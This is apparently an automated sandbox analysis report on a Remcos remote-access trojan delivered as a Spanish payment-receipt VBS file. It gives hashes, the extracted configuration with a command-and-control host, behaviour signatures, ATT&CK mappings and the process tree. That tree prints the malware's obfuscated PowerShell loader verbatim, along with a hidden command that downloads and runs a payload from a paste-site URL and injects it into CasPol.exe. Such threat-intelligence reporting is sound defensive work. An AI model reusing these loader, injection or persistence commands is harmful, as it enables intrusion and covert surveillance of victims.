remcos | 4287a4d23b855bf6ce9ff903998b58468c9dbf03255e486cda93f0115957edbf

General

Target

DEPOSITO EN CUENTA EMPRESARIAL COMPROBANTE DE PAGO.vbs
Size

205KB
MD5

a922f12891bb10b7fa058b7974950de6
SHA1

5a7e081ae52a26ebc08b0076493a73afbc58fc9e
SHA256

4287a4d23b855bf6ce9ff903998b58468c9dbf03255e486cda93f0115957edbf
SHA512

2d6f4865ccbe9b99113d7568aeeb0e6e6250f9cde87227ea5efc5aaee8aa1758679f02c046c6396feece1c9fd5607415403578bec90583ee4e7aa6a08506b5e3

Score

10^/10

remcos roda11 rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pasteio.com/download/xc3Ey7lGXuPW

Extracted

Family

remcos

Botnet

roda11

C2

nod.con-ip.com:2405

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
logs
keylog_path
%AppData%
mouse_option
false
mutex
mcos1017-WJ8SF4
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Remcos
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 3984 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation WScript.exe

flow	pid	process
5	3984	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\E9O8Nw.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\E9O8Nw.vbs	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3984 set thread context of 4908 3984 powershell.exe CasPol.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

3136 powershell.exe
3136 powershell.exe
3984 powershell.exe
3984 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3136 powershell.exe
Token: SeDebugPrivilege 3984 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

CasPol.exe

pid process

4908 CasPol.exe

description	pid	process	target process
PID 3984 set thread context of 4908	3984	powershell.exe	CasPol.exe

pid	process
3136	powershell.exe
3136	powershell.exe
3984	powershell.exe
3984	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3136	powershell.exe
Token: SeDebugPrivilege	3984	powershell.exe

pid	process
4908	CasPol.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 4156 wrote to memory of 3136	4156	WScript.exe	powershell.exe
PID 4156 wrote to memory of 3136	4156	WScript.exe	powershell.exe
PID 3136 wrote to memory of 3984	3136	powershell.exe	powershell.exe
PID 3136 wrote to memory of 3984	3136	powershell.exe	powershell.exe
PID 3984 wrote to memory of 4908	3984	powershell.exe	CasPol.exe
PID 3984 wrote to memory of 4908	3984	powershell.exe	CasPol.exe
PID 3984 wrote to memory of 4908	3984	powershell.exe	CasPol.exe
PID 3984 wrote to memory of 4908	3984	powershell.exe	CasPol.exe
PID 3984 wrote to memory of 4908	3984	powershell.exe	CasPol.exe
PID 3984 wrote to memory of 4908	3984	powershell.exe	CasPol.exe
PID 3984 wrote to memory of 4908	3984	powershell.exe	CasPol.exe
PID 3984 wrote to memory of 4908	3984	powershell.exe	CasPol.exe
PID 3984 wrote to memory of 4908	3984	powershell.exe	CasPol.exe
PID 3984 wrote to memory of 4908	3984	powershell.exe	CasPol.exe
PID 3984 wrote to memory of 4908	3984	powershell.exe	CasPol.exe
PID 3984 wrote to memory of 4908	3984	powershell.exe	CasPol.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DEPOSITO EN CUENTA EMPRESARIAL COMPROBANTE DE PAGO.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4156

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAE8ASQBVAEcAdwAlACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AG⌚⌚⌚AaQBvAC4AYwBvAG0ALwBkAG8AdwBuAGwAbwBhAGQALwB4AGMAMwBFAHkANwBsAEcAWAB1AFAAVwAnACkAKQA7AFsAcwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAH⌚⌚⌚AcgByAG⌚⌚⌚AbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAG⌚⌚⌚AKAAnAE4AdwBnAG8AeABNAC4ASwBQAEoAYQBOAGoAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFAAVQBsAEcASwBBACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH⌚⌚⌚AbABsACwAIABbAG8AYgBqAG⌚⌚⌚AYwB0AFsAXQBdACAAKAAnAHcATgA4AE8AOQBFAGQAOQBxAFAA⌚⌚⌚gB4AC8AZABhAG8AbABuAHcAbwBkAC8AbQBvAGMALgBvAGkAZQB0AHMAYQBwAC8ALwA6AHMAcAB0AHQAaAAnACAALAAgACQA⌚⌚⌚gBvAGQAYQBDAG8AcAB5ACAALAAgACcARQA5AE8AOABOAHcAJwAgACkAKQA=';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('%OIUGw%', 'C:\Users\Admin\AppData\Local\Temp\DEPOSITO EN CUENTA EMPRESARIAL COMPROBANTE DE PAGO.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3136

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\DEPOSITO EN CUENTA EMPRESARIAL COMPROBANTE DE PAGO.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pasteio.com/download/xc3Ey7lGXuPW'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('wN8O9Ed9qPRx/daolnwod/moc.oietsap//:sptth' , $RodaCopy , 'E9O8Nw' ))"
3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3984

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:4908

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
23909774a4f0358be8e03226d73fbd61

SHA1
4df262994ce4eb3935965881c1e2dc730668da94

SHA256
6dbd177f5aa34f836bf52885c04a3a93771384ebad954911be812c039290bcad

SHA512
6ed0bfd0a498043cccf9ef2d9bebc869c4f5f2befc90636e2e3167b2d0b694c538f93aaeefe221bc08ca3962c6499f402df4934444c9f82883d3314075d5f05b

Download Submit
memory/3136-131-0x0000024ACB470000-0x0000024ACB492000-memory.dmp

Filesize
136KB

Download
memory/3136-132-0x00007FFE170F0000-0x00007FFE17BB1000-memory.dmp

Filesize
10.8MB

Download
memory/3136-142-0x00007FFE170F0000-0x00007FFE17BB1000-memory.dmp

Filesize
10.8MB

Download
memory/3136-130-0x0000000000000000-mapping.dmp

Download
memory/3984-133-0x0000000000000000-mapping.dmp

Download
memory/3984-134-0x00007FFE170F0000-0x00007FFE17BB1000-memory.dmp

Filesize
10.8MB

Download
memory/3984-138-0x00007FFE170F0000-0x00007FFE17BB1000-memory.dmp

Filesize
10.8MB

Download
memory/4908-136-0x000000000043168C-mapping.dmp

Download
memory/4908-139-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download
memory/4908-137-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download
memory/4908-135-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download
memory/4908-143-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download
memory/4908-144-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads